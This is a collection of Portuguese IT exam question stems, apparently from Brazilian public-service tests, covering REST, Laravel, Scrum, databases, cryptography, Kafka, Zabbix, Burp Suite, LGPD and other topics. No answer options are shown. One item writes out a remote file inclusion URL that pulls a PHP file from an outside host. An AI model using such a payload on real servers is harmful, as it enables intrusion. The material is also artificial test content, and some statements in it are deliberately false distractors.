Assinale a opção que representa uma tecnologia com as seguintes
características: arquitetura formada por recursos, servidores e
clientes, comunicação stateless, armazenamento em cache,
uniformidade de interface e código sob demanda.
No framework Laravel, há uma ferramenta que é uma
implementação mínima e simples de diversos recursos de
autenticação, tais como login, cadastro, redefinição de senha e
verificação de e-mail. Além disso, a camada de visualização é, por
padrão, composta de simples templates Blade estilizados com
Tailwind CSS.
O recurso do Laravel descrito acima é o
As metodologias ágeis promovem flexibilidade, colaboração e
entrega incremental, adaptando-se rapidamente às mudanças em
diversos tipos de trabalho. Elas utilizam práticas para organizar
tarefas, visualizar o fluxo de trabalho e garantir qualidade
contínua.
Nesse sentido, correlacione as metodologias ágeis apresentadas a
seguir com suas respectivas descrições.
1. Scrum
2. Kanban
3. XP(Extreme Programming)
( ) Método focado na gestão do fluxo contínuo de trabalho,
utilizando um quadro visual para representar as etapas do
trabalho, promovendo a visualização das tarefas em diferentes
estágios e a limitação do trabalho em andamento.
( ) Metodologia que enfatiza a excelência técnica através da
adoção de práticas específicas que visam a alta qualidade do
processo de trabalho e do produto final, como revisões
frequentes, feedback constante e foco na melhoria contínua
do processo.
( ) Framework que define papéis e eventos específicos para a
gestão do trabalho em equipe, estruturado em iterações
curtas (sprints) com objetivos definidos, buscando entregas
incrementais de valor e a adaptação contínua ao contexto,
com foco na gestão do projeto como um todo.
Assinale a opção que indica a relação correta, na ordem
apresentada.
Alguns Sistemas de Gerenciamento de Bancos de Dados (SGBDs)
mais antigos ou especializados não suportam múltiplos valores
diretamente no INSERT e requerem abordagens alternativas como
loops ou vários comandos separados.
Dos SGBDs listados a seguir, o que suporta múltiplos valores no
INSERT desde suas versões iniciais é o
Durante uma auditoria no setor de TI de TCE-RR, foi constatado
que os analistas estavam utilizando criptografia por chave pública
para o envio de informações confidenciais. Para garantir que os
dados sejam protegidos contra acessos não autorizados, cada
servidor precisa configurar corretamente as chaves de criptografia
antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o
processo de envio de uma mensagem criptografada é correto
afirmar que
No planejamento e ao controle de projetos, uma prática avançada
para garantir o alinhamento entre a execução do projeto e os
objetivos estratégicos da organização é
No contexto da gestão de serviços de TI, analise as afirmativas a
seguir.
I. Em ambientes que seguem frameworks como ITIL, práticas de
compliance devem ser tratadas separadamente dos processos
de gerenciamento de serviços, para evitar atrasos nas
auditorias internas e externas.
II. Auditorias de TI devem ser realizadas exclusivamente para
verificar a conformidade com normas e regulamentações, sem
impacto direto na melhoria dos processos de gerenciamento
de incidentes e mudanças.
III. A realização de auditorias sistemáticas pode reduzir falhas de
conformidade ao identificar e monitorar indicadores críticos
em tempo real, permitindo ações corretivas alinhadas a
padrões regulatórios.
Apache Kafka e RabbitMQ são duas tecnologias importantes no
contexto de desenvolvimento de aplicações modernas quando se
trata de pipeline de dados de streaming e mensageria.
A respeito dessas ferramentas, julgue as seguintes afirmativas:
I. O Kafka emprega um modelo de log particionado, o qual reúne
abordagens de fila de mensagens e assinatura de publicação.
II. O RabbitMQ utiliza um protocolo binário via TCP.
III. O Kafka não permite que variados consumidores recebam a
mesma mensagem, uma vez que são excluídas após consumo.
Relacione as etapas de modelagem lógica e física de banco de dados às afirmativas a elas associadas 1. Modelagem Lógica. 2. Modelagem Física. ( ) É dependente do SGBD. ( ) Tem foco maior nas entidades e relacionamentos. ( ) Utiliza tipos de dados genéricos ou abstratos. ( ) Considera itens de desempenho tais como índices, particionamento, etc. A relação correta, na ordem apresentada, é
O Zabbix é uma solução open source de monitoramento
distribuído. É um software que monitora vários parâmetros de
dispositivos de rede e a saúde e integridade de servidores,
sistemas e aplicações. A arquitetura Zabbix possui diversos
componentes, cada um com uma função específica.
O componente responsável por fazer a coleta de dados sobre
disponibilidade e integridade de sistemas de TI em clientes em
uma rede remota é o
Em relação à metodologia de gerência de projetos Scrum, analise
as afirmativas a seguir.
I. O time de desenvolvimento é responsável por garantir a
realização das tarefas do Sprint Backlog. II. O Product Backlog é gerenciado pelo Product Owner, contendo
itens priorizados de acordo com o valor para o cliente.
III. A Definition of Done é um artefato utilizado pelo Scrum Master
para controlar a qualidade do trabalho.
A página web da sociedade empresária Exemplo1234, disponível
na internet, permite que internautas acessem o edital de uma vaga
de trabalho por meio do endereço eletrônico
http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa
empresa, foi observado que o servidor da página web da
Empresa1234 processava o valor fornecido no parâmetro file sem
realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o
conteúdo de um arquivo malicioso hospedado no endereço
http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida
de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi
carregado e executado diretamente pelo servidor da
Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da
Empresa1234 é o
No contexto de auditoria e compliance, a pilha ELK Stack
(Elasticsearch, Logstash e Kibana) é amplamente usada para
analisar e monitorar atividades nos sistemas, especialmente no
que se refere à integridade e à segurança de dados.
Sobre as funcionalidades dessa pilha, assinale a afirmativa correta.
O Burp Suite é uma ferramenta amplamente utilizada para testes
de segurança em aplicações web, oferecendo funcionalidades
como interceptação de tráfego, análise de vulnerabilidades e
automação de ataques.
Em relação às ferramentas presentes na ferramenta Burp Suite,
analise as afirmativas a seguir.
I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS
entre o cliente e o servidor, permitindo analisar e manipular
requisições em tempo real; ele é essencial para identificar
vulnerabilidades em parâmetros, cabeçalhos e cookies.
II. O Repeater é uma ferramenta do Burp Suite para realizar
ataques automatizados, como brute force e fuzzing,
permitindo testar vulnerabilidades em parâmetros de entrada.
III. O Intruder é usado para enviar requisições manualmente,
permitindo ajustar parâmetros e repetir testes de
vulnerabilidades com base em respostas anteriores; sua
interface exibe claramente a requisição enviada e a resposta
recebida, facilitando a análise e a validação de falhas.
Aplicações de assimilação de dados em oceanografia produzem
análises e previsões de diferentes variáveis que caracterizam o
estado dos oceanos. O Escritório de Meteorologia do Reino Unido,
mais conhecido como Met Office, utiliza um modelo oceanográfico
global, chamado Forecasting Ocean Assimilation Model (FOAM), na
implementação de um esquema de assimilação variacional
tridimensional, conhecido como NEMOVAR.
Entre as variáveis que fazem parte do vetor de estados utilizado no
NEMOVAR, encontram-se
A Lei Geral de Proteção de Dados (LGPD) estabelece uma série de
princípios a ser observados durante o desenvolvimento de
sistemas que tratam dados pessoais. Esses princípios têm como
objetivo garantir a proteção e a privacidade dos dados, assim
como a transparência no seu tratamento.
Nesse sentido, de acordo com os princípios da LGPD aplicados ao
desenvolvimento de sistemas, é correto afirmar que
No estudo de dispositivos semicondutores usados na construção de
satélites, optou-se por utilizar o método da máxima verossimilhança
na estimação dos parâmetros do estudo. Segundo os especialistas,
esse método foi escolhido por apresentar boas propriedades.
Assinale a opção que apresenta as propriedades que pertencem ao
método escolhido.
Acerca dos modelos de desenvolvimento de software, avalie as
afirmativas a seguir.
I. O modelo em cascata apresenta o processo de
desenvolvimento de software como uma série de etapas
simultâneas.
II. No modelo incremental, as fases de especificação,
desenvolvimento e validação são intercaladas.
III. O modelo ágil considera que os requisitos e o projeto (design)
são desenvolvidos juntos.